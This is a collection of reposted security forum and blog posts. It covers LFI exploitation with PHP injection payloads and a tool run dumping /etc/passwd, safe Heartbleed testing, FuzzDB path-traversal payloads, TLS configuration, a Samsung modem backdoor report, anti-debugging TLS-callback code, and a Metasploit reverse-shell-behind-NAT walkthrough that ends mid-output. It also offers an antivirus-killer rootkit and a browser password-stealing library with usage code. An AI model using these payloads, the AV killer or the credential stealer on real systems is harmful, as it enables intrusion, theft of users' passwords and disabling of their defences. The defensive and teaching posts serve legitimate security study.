[h=3]LFI Exploitation : Basics, code execution and information leak [/h]Hello, Today, I played a bit with Metasploitable 2. It is really easy to root, so that's not the interest of this blog post. Anyhow, I played a bit around and I ended up coding a basic LFI exploit tool. So yet another post on LFI exploitation ... [h=2]So what is LFI?[/h] LFI stands for Local File Inclusion. It is a vulnerability that allows you to include local files. Many people do think that it's not really dangerous as it only includes LOCAL files. Unfortunately (depending on which side of the barrier you are ...), it is false, you can execute code through a LFI. [h=2]So, how do you exploit it?[/h] By including local files. Yes, local files . These are the well-known techniques for LFI: - apache logs - /proc/self/environ - php://input - NULL Byte Injection - path truncation - directory traversal - PHP filters - image inclusion with PHP code [h=3]Apache logs[/h]These were publicly accessible in old distros. Now, these are only readable by proper users. You'd basically inject PHP Code through the GET requests: ? [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]http://victim/<?php system ('id'); ?> [/TD] [/TR] [/TABLE] This would leave PHP code in the logs. Then executing the PHP code is as simple as: ? [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]http://victim/?page=/var/log/apache2/access_log [/TD] [/TR] [/TABLE] Code execution if there is no proper rights on the logs (some old systems remain). [h=3]/proc/self/environ[/h] This file is interesting as it stores stuffs like your USER-AGENT and whatsoever. So, if you change your User-Agent to ? [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]<?php system ('id'); ?> [/TD] [/TR] [/TABLE] and use this: ? [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]http://victim/?page=/proc/self/environ [/TD] [/TR] [/TABLE] Yes, code execution! [h=3]php://input[/h]Ok, this one execute PHP Code included into the POST DATA. [h=3]NULL byte injection and path truncation[/h]This one is pretty neat. Say you have the following code: ? [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]<?php include ($_GET['page'] . '.php'); ?> [/TD] [/TR] [/TABLE] Well, you can get rid of the '.php' extension using that trick. Just append or looooooots of . or /., this will get normalized and voila no more extension. NULL Byte poisoning doesn't work for PHP >= 5.3.4 as it's been fixed. Reverse path truncation is mostly the same, just the ../ is before the file name. [h=3]PHP filters[/h]This vulnerability is mainly for leaking files (.php and others). This doesn't work if you have a prefix such as here: ? [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]<?php include ($prefix + $_GET['page'] + '.php'); ?> [/TD] [/TR] [/TABLE] You exploit it using this request for instance: ? [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]http://victim/?page=php://filter/read=convert.base64-encode/resource=index.php [/TD] [/TR] [/TABLE] As you guessed, the PHP filter is ? [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]php://filter/read=convert.base64-encode/resource= [/TD] [/TR] [/TABLE] . [h=3]image with PHP code[/h] This one is about appending PHP code in an image. Using the image in the LFI allows you to inject PHP code : the PHP interpreter interprets anything as code as long as it's in <?php ?>. If you have a non exploitable LFI with /proc/self/environ or apaches logs and you don't have an extension concatenation, this can allow you to exploit it if you are able to upload images. Let's say you have PHPBB and PhpLdapAdmin 1.1.0.5. Well, you can upload an image using PHPBB then exploit the LFI in PhpLdapAdmin using the directory traversal trick => code execution. [h=2]Exploit[/h] I wrote a basic LFI exploiter that uses PHP filter or /proc/self/environ tricks. You can get it at LFI exploit tool . The code isn't clean and it needs tons of improvement before being really a usable tool. I plan on improving it on a need to basis. The cookie functionality is not implemented yet, it is just a placeholder for now. You can test it on multilidae on Metasploitable 2. I haven't tested it somewhere else yet. Example of utilisation (this is on metasploitable 2): $ ./exploit-lfi.py -h usage: exploit-lfi.py [-h] --url URL [--action ACTION] --option OPTION [--replace REPLACE] [--cookie COOKIE] Exploit LFI optional arguments: -h, --help show this help message and exit --url URL, -u URL URL to attack --action ACTION, -a ACTION exec or read (default) --option OPTION, -o OPTION Action argument --replace REPLACE, -r REPLACE string to replace --cookie COOKIE, -c COOKIE Cookie $ ./exploit-lfi.py -u 'http://192.168.56.107/mutillidae/index.php?page=show-log.php' -o 'cat /etc/passwd' [+] Checking vulnerability Test url : http://192.168.56.107/mutillidae/index.php?page=whatever& Is vulnerable with param page! [+] Found vulnerability, new URL : http://192.168.56.107/mutillidae/index.php?page=PAYLOAD& [+] Searching for root path root : ../../../ [+] New URL : http://192.168.56.107/mutillidae/index.php?page=../../../PAYLOAD& [+] Testing : {'path': '/proc/self/environ', 'type': 'header'} http://192.168.56.107/mutillidae/index.php?page=../../..//proc/self/environ& root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash bind:x:105:113::/var/cache/bind:/bin/false postfix:x:106:115::/var/spool/postfix:/bin/false ftp:x:107:65534::/home/ftp:/bin/false postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false distccd:x:111:65534::/:/bin/false user:x:1001:1001:just a user,111,,:/home/user:/bin/bash service:x:1002:1002:,,,:/home/service:/bin/bash telnetd:x:112:120::/nonexistent:/bin/false proftpd:x:113:65534::/var/run/proftpd:/bin/false statd:x:114:65534::/var/lib/nfs:/bin/false snmp:x:115:65534::/var/lib/snmp:/bin/false [h=2]Conclusion[/h]As you can see in this introduction, code execution is quite possible with a LFI. These aren't only information leaks vulnerabilities. That's all for today. Cheers, m_101 Updates - 18/12/2013 : the LFI exploit tool I wrote has been moved to its own repository : https://github.com/m101/lfipwn/ and cookie functionality does work. [h=2]References[/h] - Basics on file inclusion : File Inclusion - Security101 - Blackhat Techniques - Hacking Tutorials - Vulnerability Research - Security Tools - PhpLdapAdmin LFI : phpldapadmin Local File Inclusion - path truncation part 1 : ush.it - a beautiful place - path truncation part 2 : ush.it - a beautiful place Sursa: Binary world for binary people : LFI Exploitation : Basics, code execution and information leak
-
Testing for Heartbleed vulnerability without exploiting the server. Heartbleed is a serious vulnerability in OpenSSL that was disclosed on Tuesday, April 8th, and impacted any sites or services using OpenSSL 1.01 – 1.01.f and 1.0.2-beta1. Due to the nature of the bug, the only obvious way to test a server for the bug was an invasive attempt to retrieve memory–and this could lead to the compromise of sensitive data and/or potentially crash the service. I developed a new test case that neither accesses sensitive data nor impacts service performance, and am posting the details here to help organizations conduct safe testing for Heartbleed vulnerabilities. While there is a higher chance of a false positive, this test should be safe to use against critical services. The test works by observing a specification implementation error in vulnerable versions of OpenSSL: they respond to larger than allowed HeartbeatMessages. Details: OpenSSL was patched by commit 731f431. This patch addressed 2 implementation issues with the Heartbeat extension: HeartbeatRequest message specifying an erroneous payload length Total HeartbeatMessage length exceeding 2^14 (16,384 bytes) Newer versions of OpenSSL silently discard messages which fall into the above categories. It is possible to detect older versions of OpenSSL by constructing a HeartbeatMessage and not sending padding bytes. This results in the below evaluating true: /* Read type and payload length first */ if (1 + 2 + 16 > s->s3->rrec.length) return 0; /* silently discard */ Vulnerable versions of OpenSSL will respond to the request. However no server memory will be read because the client sent payload_length bytes. False positives may occur when all the following conditions are met (but it is unlikely): The service uses a library other than OpenSSL The library supports the Heartbeat extension The service has Heartbeat enabled The library performs a fixed length padding check similar to OpenSSL False negatives may occur when all the following conditions are met, and can be minimized by repeating the test: The service uses a vulnerable version of OpenSSL The Heartbeat request isn’t received by the testing client I have modified the Metasploit openssl_heartbleed module to support the ‘check’ option. You can download the updated module at https://github.com/dchan/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb We hope you can use this to test your servers and make sure any vulnerable ones get fixed! David Chan Mozilla Security Engineer Sursa: https://blog.mozilla.org/security/2014/04/12/testing-for-heartbleed-vulnerability-without-exploiting-the-server/
-
Using FuzzDB for Testing Website Security After posting an introduction to FuzzDB I received the suggestion to write more detailed walkthroughs of the data files and how they could be used during black-box web application penetration testing. This article highlights some of my favorite FuzzDB files and discusses ways I’ve used them in the past. If there are particular parts or usages of FuzzDB you’d like to see explored in a future blog post, let me know. Exploiting Local File Inclusion Scenario: While testing a website you identify a Local File Inclusion (LFI) vulnerability. Considering the various ways of exploiting LFI bugs, there are several pieces of required information that FuzzDB can help us to identify. (There is a nice cheatsheet here: Exploiting PHP File Inclusion – Overview | Reiners' Weblog) The first is directory traversal: How far to traverse? How do the characters have to be encoded to bypass possible defensive relative path traversal blacklists, a common but poor security mechanism employed by many applications? FuzzDB contains an 8 directory deep set of Directory Traversal attack patterns using various exotic URL encoding mechanisms: https://code.google.com/p/fuzzdb/source/browse/trunk/attack-payloads/path-traversal/traversals-8-deep-exotic-encoding.txt For example: /%c0%ae%c0%ae\{FILE} /%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} /%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae/{FILE} In your fuzzer, you’d replace {FILE} with a known file location appropriate to the type of system you’re testing, such as the string “etc/password” (for a UNIX system target) then review the output of the returned request responses to find responses indicating success, ie, that the targeted file has been successfully retrieved. In terms of workflow, try sorting the responses by number of bytes returned, the successful response will most become immediately apparent. The cheatsheet discusses a method of including injected PHP code, but in order to do this, you need to be able to write to the server’s disk. Two places that the HTTPD daemon typically would have write permissions are the access and error logs. FuzzDB contains a file of common location for HTTP server log files culled from popular distribution packages. After finding a working traversal string, configure your fuzzer to try these file locations, appended to the previously located working directory path: https://code.google.com/p/fuzzdb/source/browse/trunk/attack-payloads/lfi/common-unix-httpd-log-locations.txt Fuzzing for Unknown Methods Improper Authorization occurs when an application doesn’t validate whether the current user context has permission to perform the requested command. One common presentation is in applications which utilize role-based access control, where the application uses the current user’s role in order to determine which menu options to display, but never validates that the chosen option is within the current user’s allowed permissions set. Using the application normally, a user would be unlikely to be able to select an option they weren’t allowed to use because it would never be presented. If an attacker were to learn these methods, they’d be able to exceed the expected set of permissions for their user role. Many applications use human-readable values for application methods passed in parameters. FuzzDB contains list of common web method names can be fuzzed in an attempt to find functionality that may be available to the user but is not displayed by any menu. https://code.google.com/p/fuzzdb/source/browse/trunk/attack-payloads/BizLogic/CommonMethods.fuzz.txt These methods can be injected wherever you see others being passed, such as in GET and POST request parameter values, cookies, serialized requests, REST urls, and with web services. Protip: In addition to this targeted brute-force approach it can also be useful to look inside the site’s Javascript files. If the site designers have deployed monolithic script files that are downloaded by all users regardless of permissions where the application pages displayed to a user only call the functions that are permitted for the current user role, you can sometimes find endpoints and methods that you haven’t observed while crawling the site. Leftover Debug Functionality Software sometimes gets accidentally deployed with leftover debug code. When triggered, the results can range from seeing extended error messages that reveal sensitive information about the application state or configuration that can be useful for helping to plan further attacks to bypassing authentication and/or authorization, or to displaying additional test functionality that could violate the integrity or confidentiality of data in ways that the developers didn’t intend to occur in a production scenario. FuzzDB contains a list of debug parameters that have been observed in bug reports, in my own experience, and some which are totally hypothesized by me but realistic: https://code.google.com/p/fuzzdb/source/browse/trunk/attack-payloads/BizLogic/DebugParams.fuzz.txt Sample file content: admin=1 admin=true admin=y admin=yes adm=true adm=y adm=yes dbg=1 dbg=true dbg=y dbg=yes debug=1 debug=true debug=y debug=yes “1” “true” “y” and “yes” are the most common values I’ve seen. If you observe a different but consistent scheme in use in the application you’re assessing, plug that in. In practice, I’ve had luck using them as name/value pairs for GET requests, POST requests, as cookie name/value pairs, and inside serialized requests in order to elicit a useful response (for the tester) from the server. Predictable File Locations Application installer packages place components into known, predictable locations. FuzzDB contains lists of known file locations for many popular web servers and applications https://code.google.com/p/fuzzdb/source/browse/trunk/#trunk%2Fdiscovery%2FPredictableRes Example: You identify that the server you’re testing is running Apache Tomcat. A list of common locations for interesting default Tomcat files is used to identify information leakage and additional attackable functionality. https://code.google.com/p/fuzzdb/source/browse/trunk/discovery/PredictableRes/ApacheTomcat.fuzz.txt Example: A directory called /admin is located. Sets of files are deployed which will aid in identifying resources likely to be in such a directory. https://code.google.com/p/fuzzdb/source/browse/trunk/discovery/PredictableRes/Logins.fuzz.txt Forcible Browsing for Potentially Interesting Files Certain operating systems and file editors can inadvertently leave backup copies of sensitive files. This can end up revealing source code, pages without any inbound links, credentials, compressed backup files, and who knows what. FuzzDB contains hundreds of common file extensions including one hundred eighty six compressed file format extensions, extensions commonly used for backup versions of files, and a set of primitives of “COPY OF” as can be prepended to filenames by Windows servers. https://code.google.com/p/fuzzdb/source/browse/#svn%2Ftrunk%2Fdiscovery%2FFilenameBruteforce In practice, you’d use these lists in your fuzzer in combination with filenames and paths discovered while crawling the targeted application. Upcoming posts will discuss other usage scenarios. Sursa: https://blog.mozilla.org/security/2014/03/25/using-fuzzdb-for-testing-website-security/
-
[h=1]Navigating the TLS landscape[/h] A few weeks ago, we enabled Perfect Forward Secrecy on https://www.mozilla.org [1]. Simultaneously, we published our guidelines for configuring TLS on the server side. In this blog post, we want to discuss some of the SSL/TLS work that the Operations Security (OpSec) team has been busy with. For operational teams, configuring SSL/TLS on servers is becoming increasingly complex. BEAST, LUCKY13, CRIME, BREACH and RC4 are examples of a fast moving security landscape, that made recommendations from a only few months ago already obsolete. Mozilla’s infrastructure is growing fast. We are adding new services for Firefox and Firefox OS, in addition to an ever increasing number of smaller projects and experiments. The teams tasked with deploying and maintaining these services need help sorting through known TLS issues and academic research. So, for the past few months, OpSec has been doing a review of the state-of-the-art of TLS. This is in parallel and complementary to work by the Security Engineering team on cipher preferences in Firefox. The end goal being to support, at the infrastructure level, the security features championed by Firefox. We published our guidelines at https://wiki.mozilla.org/Security/Server_Side_TLS. The document is a quick reference and a training guide for engineers. There is a strong demand for a standard ciphersuite that can be copied directly into configuration files. But we also wanted to publish the building blocks of this ciphersuite, and explain why a given cipher is prefered to another. These building blocks are the core of the ciphersuite discussion, and will be used as references when new attacks are discovered. Another important aspect of the guideline is the need to be broad, we want people to be able to reach https://mozilla.org and access Mozilla’s services from anywhere. For this reason, SSLv3 is still part of the recommended configuration. However, ciphers that are deprecated, and no longer needed for backward compatibility are disabled. DSA ciphers are included in the list as well, even though almost no-one uses DSA certificates right now, but might in the future. At the core of our effort is a strong push toward Perfect Forward Secrecy (PFS) and OCSP stapling. PFS improves secrecy in the long run, and will become the de-facto cipher in all browsers. But it comes with new challenges: the handshake takes longer, due to the key exchange, and a new parameter (dhparam/ecparam) is needed. Ideally, the extra-parameter should provide the same level of security as the RSA key does. But we found that old client libraries, such as Java 6, are not compatible with larger parameter sizes. This is a problem we cannot solve server-side, because the client has no way to tell the server which parameter sizes it supports. As a result, the server will start the PFS handshake, and the client will fail in the middle of the handshake. Without a way for the handshake to fall back and continue, we have to use smaller parameter sizes until old libraries can be deprecated. OCSP stapling is a big performance improvement. OCSP requests to third party resolvers block the TLS Handshake, directly impacting the user’s perception of page opening time. Recent web servers can now cache the OCSP response and serve it directly, saving the round trip to the client. OCSP stapling is likely to become an important feature of Browsers in the near future, because it improves performances, and reduces the cost of running worldwide OCSP responders for Certificate Authorities. OpSec will maintain this document by keeping it up to date with changes in the TLS landscape. We are using it to drive changes in Mozilla’s infrastructure. This is not a trivial task, as TLS is only one piece of the complex puzzle of providing web connectivity to large websites. We found that very few products provide the full set of features we need, and most operating systems don’t provide the latest TLS versions and ciphers. This is a step forward, but it will take some time until we provide first class TLS across the board. Feel free to use, share and discuss these guidelines. We welcome feedback from the security and cryptography communities. Comments can be posted on the discussion section of the wiki page, submitted to the dev-tech-crypto mailing list, posted on Bugzilla, or in #security on IRC. This a public resource, meant to improve the usage of HTTPS on the Internet. Sursa: https://blog.mozilla.org/security/2013/11/12/navigating-tls/
-
[h=1]Backdoor exploit discovered in Samsung Galaxy[/h] Posted by: FastFlux March 13, 2014 in Mobile, Security A zero-day has been discovered that allows attacks to remotely exploit a software-based backdoor contained in a minimum of nine various types of Samsung smartphones and tablets. This exploit allows the attacker to steal documents and location information or activate a microphone and camera. The news came to light Wednesday by individuals of the Replicant project, which develops free variants of Android to replace the static versions pre-installed by most carriers and suppliers. Replicant developers stated they discovered that the radio modems on several Samsung devices will carry out remote file system (RFS) commands. “We discovered that the proprietary program running on the applications processor in charge of handling the communication protocol with the modem actually implements a back door that lets the modem perform remote file I/O operations on the file system,” said Replicant developer Paul Kocialkowski in a article posted on Free software Foundation. “This program is shipped with the Samsung Galaxy devices and makes it possible for the modem to read, write, and delete files on the phone’s storage,”, “On several phone models, this program runs with sufficient rights to access and modify the user’s personal data.” he added. Samsung didn’t immediately reply to an emailed request for comment about Replicant’s findings or even to question about which models may be affected and whether or not they planned to patch vulnerable devices. According to Replicant’s research discovered nine various kinds of Samsung devices which contain the vulnerability: the Nexus S, Galaxy S, Galaxy S 2, Galaxy Note, Galaxy Nexus, Galaxy Tab 2 7.0, Galaxy Tab 2 10.1, Galaxy S 3, and Galaxy Note 2. Other devices are unknown at this time, they speculate there could be many more. affected. Sursa: Backdoor exploit discovered in Samsung Galaxy
-
[h=1]Detect debugger with TLS callback[/h][h=3]zwclose7[/h] TLS callback is a function that called before the process entry point executes. If you run the executable with a debugger, the TLS callback will be executed before the debugger breaks. This means you can perform anti-debugging checks before the debugger can do anything. Therefore, TLS callback is a very powerful anti-debugging technique. To add a TLS callback to your program, you need to create a section called .CRT$XLB in the executable image, and then put the TLS callback function address into this section. You also need to add the __tls_used symbol to the executable image. The following stack trace shows how the TLS callback called (from Process Hacker) 0, ntoskrnl.exe!KiDeliverApc+0x1c7 1, ntoskrnl.exe!KiCommitThreadWait+0x3dd 2, ntoskrnl.exe!KeWaitForSingleObject+0x19f 3, win32k.sys!xxxRealSleepThread+0x257 4, win32k.sys!xxxSleepThread+0x59 5, win32k.sys!NtUserWaitMessage+0x46 6, ntoskrnl.exe!KiSystemServiceCopyEnd+0x13 7, wow64cpu.dll!CpupSyscallStub+0x9 8, wow64cpu.dll!Thunk0Arg+0x5 9, wow64.dll!RunCpuSimulation+0xa 10, wow64.dll!Wow64LdrpInitialize+0x42a 11, ntdll.dll!LdrpInitializeProcess+0x17e3 12, ntdll.dll! ?? ::FNODOBFM::`string'+0x28ff0 13, ntdll.dll!LdrInitializeThunk+0xe 14, user32.dll!NtUserWaitMessage+0x15 15, user32.dll!DialogBox2+0x222 16, user32.dll!InternalDialogBox+0xe5 17, user32.dll!SoftModalMessageBox+0x757 18, user32.dll!MessageBoxWorker+0x269 19, user32.dll!MessageBoxTimeoutW+0x52 20, user32.dll!MessageBoxTimeoutA+0x76 21, user32.dll!MessageBoxExA+0x1b 22, user32.dll!MessageBoxA+0x18 23, tls.exe!TlsCallback+0x3c 24, ntdll.dll!LdrpCallInitRoutine+0x14 25, ntdll.dll!LdrpCallTlsInitializers+0x9e 26, ntdll.dll!LdrpRunInitializeRoutines+0x3ab 27, ntdll.dll!LdrpInitializeProcess+0x1400 28, ntdll.dll!_LdrpInitialize+0x78 29, ntdll.dll!LdrInitializeThunk+0x10 You can see the TLS callback is called by the loader during process startup. Here is example code. #include <stdio.h>#include <Windows.h> #pragma comment(lib,"ntdll.lib") #pragma comment(linker,"/include:__tls_used") // This will cause the linker to create the TLS directory #pragma section(".CRT$XLB",read) // Create a new section extern "C" NTSTATUS NTAPI NtQueryInformationProcess(HANDLE hProcess,ULONG InfoClass,PVOID Buffer,ULONG Length,PULONG ReturnLength); #define NtCurrentProcess() (HANDLE)-1 // The TLS callback is called before the process entry point executes, and is executed before the debugger breaks // This allows you to perform anti-debugging checks before the debugger can do anything // Therefore, TLS callback is a very powerful anti-debugging technique void WINAPI TlsCallback(PVOID Module,DWORD Reason,PVOID Context) { PBOOLEAN BeingDebugged=(PBOOLEAN)__readfsdword(0x30)+2; HANDLE DebugPort=NULL; if(*BeingDebugged) // Read the PEB { MessageBox(NULL,"Debugger detected!","TLS callback",MB_ICONSTOP); } else { MessageBox(NULL,"No debugger detected","TLS callback",MB_ICONINFORMATION); } // Another check if(!NtQueryInformationProcess( NtCurrentProcess(), 7, // ProcessDebugPort &DebugPort, // If debugger is present, it will be set to -1 | Otherwise, it is set to NULL sizeof(HANDLE), NULL)) { if(DebugPort) { MessageBox(NULL,"Debugger detected!","TLS callback",MB_ICONSTOP); } else { MessageBox(NULL,"No debugger detected","TLS callback",MB_ICONINFORMATION); } } } __declspec(allocate(".CRT$XLB")) PIMAGE_TLS_CALLBACK CallbackAddress[]={TlsCallback,NULL}; // Put the TLS callback address into a null terminated array of the .CRT$XLB section // The entry point is executed after the TLS callback int main() { printf("Hello world"); getchar(); return 0; } [h=4]Attached Files[/h] tls.zip 350.48KB 15 downloads Sursa: Detect debugger with TLS callback - Source Codes - rohitab.com - Forums
-
[h=1]PatchGuard disabling code for up-to-date Win8.1[/h] Source download : https://github.com/tandasat/findpg Deverloped by : https://twitter.com/standa_t Via: DEMO PatchGuard disabling code for up-to-date Win8.1 - Source Codes - rohitab.com - Forums
-
[h=1]Antivirus killer with AFX Rootkit[/h] This is my new antivirus killer, AFX KillAV. This program block execution of antivirus software. AFX Windows Rootkit 2003 is used to hide the process of this program. Features: Run on Windows startup. Block execution of antivirus software. Hide the running process of itself using AFX Windows Rootkit 2003. AFX Windows Rootkit 2003 is a user mode rootkit that allow you to hide processes, files and registry. [h=4]Attached Files[/h] winav.zip 404.1KB 1158 downloads Sursa: Antivirus killer with AFX Rootkit - Source Codes - rohitab.com - Forums
-
[h=1]Password recovery for firefox, IE, google talk and more[/h]By [h=3]shebaw[/h]Hi everyone, since there is growing number of topics about password recovery, I decided to share my code I wrote after disassembling popular recovery software. I was hoping I would clean it up a little bit (too many callbacks, memory mapping). It recovers passwords stored by: IE 4-9, Firefox 0-the latest version, GTalk, MSN Messenger, Windows Live Messenger, Generic Network & Visible domain passwords. I'm sorry for cramming most of the recovery code in pass_recov.c. I was hopping I would break that up. I've attached the project. Here is how you would use it. Here is a sample code on how to use it. #include <stdio.h> #include "pass_recov.h" void CALLBACK display_pass(pass_type_t ptype, const wchar_t *url, const wchar_t *username, const wchar_t *password, void *param) { switch (ptype) { case firefox3: case firefox4: wprintf(L"firefox pass username:%s password:%s", username, password); break; /* and so on, you get the idea */ } } int main(void) { struct cred_grab_arg carg; carg.grab_pass = display_pass; /* user defined callback, that's called for each password recovered */ carg.param = NULL; /* user defined paramater that's used to pass values to the callback, NULL in this case */ get_firefox_passwords(&carg); get_ie_passwords(&carg); return 0; } he previous versions of firefox (0-3) used signon[1-3].txt while the later versions use sqlite database. The functions used to manipulate the sqlite databases are loaded from firefox's installation directory so sqlite doesn't need to be linked statically. It works from firefox 0 - the latest version. I didn't test the IE recovery code on IE 10 but it should work. IE 7 and above hash the passwords stored for each site using the url of the website which I think is clever. It can be circumvented if IE is set to store history of the browsed sites (default behavior) since we can get the urls to see if the hashes match. I'm not sure how IE 'sanitizes' the urls since it differs from sites to sites so I've added two ways which I noticed.[h=4]Attached Files[/h] pass_recov.zip 16.58KB 842 downloads Sursa: Password recovery for firefox, IE, google talk and more - Source Codes - rohitab.com - Forums
-
Metasploit Meterpreter and NAT Published January 4, 2014 | By Corelan Team (corelanc0d3r) Professional pentesters typically use a host that is connected directly to the internet, has a public IP address, and is not hindered by any firewalls or NAT devices to perform their audit. Hacking "naked" is considered to be the easiest way to perform a penetration test that involves getting shells back. Not everyone has the luxury of putting a box directly connected to the internet and as the number of free public IP addresses continues to decrease, the need for using an audit box placed in a LAN, behind a router or firewall, will increase. Putting an audit box behind a device that will translate traffic from private to public and vice versa has some consequences. Not only will you need to be sure that the NAT device won’t "break" if you start a rather fast portscan, but since the host is in a private LAN, behind a router or firewall, it won’t be reachable directly from the internet. Serving exploits and handling reverse, incoming, shells can be problematic in this scenario. In this small post, we’ll look at how to correctly configure Meterpreter payloads and make them work when your audit box is behind a NAT device. We’ll use a browser exploit to demonstrate how to get a working Meterpreter session, even if both the target and the Metasploit "attacker" box are behind NAT. Network setup I’ll be using the following network setup in this post: Both the attacker and the target are behind a NAT device. We don’t know the IP range used by the target and we’ve determined there is no direct way in from the internet to the target network, so the public IP of the target is not relevant. We’ll assume that the target has the ability to connect to the internet over port 80 and 443. I’ve used IP 1.1.1.1 to indicate the "public" side of our attack network. You will have to replace this IP with your own public IP when trying the steps in this post. I will use Kali Linux as the attacker and I have set up a clone of the Metasploit Git repository on the box: cd / mkdir -p /pentest/exploits git clone https://github.com/rapid7/metasploit.git cd metasploit-framework bundle install If you already had a git clone set up, make sure to update to the latest and greatest with "git pull". (A small bug, related with using Meterpreter behind NAT was just fixed a few hours ago, so it’s important to update to the latest version) The target is just a Windows XP SP3 box, but it doesn’t really matter what it is, as long as we can use a browser exploit to demonstrate how to use Meterpreter. I have installed Internet Explorer 8 from IECollection (download here: Utilu IE Collection - Utilu.com). I’ll be using this IE version because it’s outdated and pretty much vulnerable to most of the IE8 browser exploits out there. Set up forwarding on the attacker side If we ever want to be able to accept connections from the target, we will need to configure the attacker firewall/NAT to forward traffic on certain ports. The exact steps to do this will be very specific to the brand/model/type of router/firewall that you are using, so this is beyond the scope of this post. In general, the idea is to configure the router/firewall so traffic to the public IP address of the router, on ports 80 and 443, will be forwarded to 192.168.0.187 (which is the LAN IP of my attacker box). When setting up the router/firewall, make sure to check if port 80 and/or 443 are not used by the router/firewall (management interface, VPN endpoint, etc). We’ll use port 80 to serve the browser exploit and port 443 for the reverse Meterpreter connection. First, we need to verify that the forwarding works. On Kali, create a small html file and store it under /tmp root@krypto1:/# cd /tmp root@krypto1:/tmp# echo "It works" > test.html Next, make sure nothing is currently using port 80 or port 443 root@krypto1:/tmp# netstat -vantu | grep :80 root@krypto1:/tmp# netstat -vantu | grep :443 If you don’t see output to both commands, you should be good to go. If something is listed, you’ll need to find what process is using the port and kill the process. For port 80, you could check the processes that are taking control over the http port using the following lsof command: root@krypto1:/tmp# lsof -i | grep :http apache2 4634 root 4u IPv6 393366 0t0 TCP *:http (LISTEN) apache2 4642 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN) apache2 4643 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN) apache2 4644 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN) apache2 4645 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN) apache2 4646 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN) Just stop apache2 to free up the port: root@krypto1:/tmp# service apache2 stop Stopping web server: apache2 ... waiting . root@krypto1:/tmp# With all ports available, we’ll run a simple web server and serve the "test.html" page. From the folder that contains the test.html file, run this python command: root@krypto1:/tmp# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... If you now connect to http://192.168.0.187/test.html from the Kali box itself, you should see the "It works" page and the The output on the Kali box should list the connection and show that the page was served with response 200 root@krypto1:/tmp# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 192.168.0.187 - - [04/Jan/2014 12:42:02] "GET /test.html HTTP/1.1" 200 - Perfect, this proves that the webserver works. On the target computer, connect to http://1.1.1.1/test.html (again, replace 1.1.1.1 with the public IP of the router/firewall on the attacker side) and you should get the same thing. If you don’t see the page, check that the forwarding is set up correctly. If this works for port 80, go back to the attacker box and terminate the python command using CTRL+C. Then launch the command again, this time using port 443: root@krypto1:/tmp# python -m SimpleHTTPServer 443 Serving HTTP on 0.0.0.0 port 443 ... Now access the webserver over port 443. Despite the fact that we are using 443 and that 443 is commonly associated with https (encrypted), our python handler is not using encryption. In other words, we still have to use http instead of https in the URL: root@krypto1:/tmp# python -m SimpleHTTPServer 443 Serving HTTP on 0.0.0.0 port 443 ... 192.168.0.187 - - [04/Jan/2014 12:47:44] "GET /test.html HTTP/1.1" 200 - 192.168.0.187 - - [04/Jan/2014 12:47:44] code 404, message File not found 192.168.0.187 - - [04/Jan/2014 12:47:44] "GET /favicon.ico HTTP/1.1" 404 - 192.168.0.187 - - [04/Jan/2014 12:47:44] code 404, message File not found 192.168.0.187 - - [04/Jan/2014 12:47:44] "GET /favicon.ico HTTP/1.1" 404 - (don’t worry about the 404 messages related with /favicon.ico – it’s safe to ignore them) If you can connect to http://1.1.1.1:443/test.html from the target computer, we know that the port forwarding is working correctly for both port 80 and 443. If this doesn’t work, there’s no point in proceeding, because anything else we try will fail. When everything works, close the python command to free up port 443 too. Metasploit configuration Browser exploit – meterpreter/reverse_https First of all, let’ set up Metasploit to serve the browser exploit and handle a reverse https Meterpreter connection. The idea is to trick the target into connecting to the exploit on port 80 and serve the meterpreter/reverse_https connection over port 443. Go to the metasploit-framework folder, open msfconsole (don’t forget the ./ if you want to be sure you’re running msfconsole from the current folder and not the version that was installed with Kali) and select an exploit. For the sake of this exercise, I’ll use ms13_069_caret.rb: root@krypto1:/tmp# cd /pentest/exploits/metasploit-framework/ (master) root@krypto1:/pentest/exploits/metasploit-framework# ./msfconsole , , / \ ((__---,,,---__)) (_) O O (_)_________ \ _ / |\ o_o \ M S F | \ \ _____ | * ||| WW||| 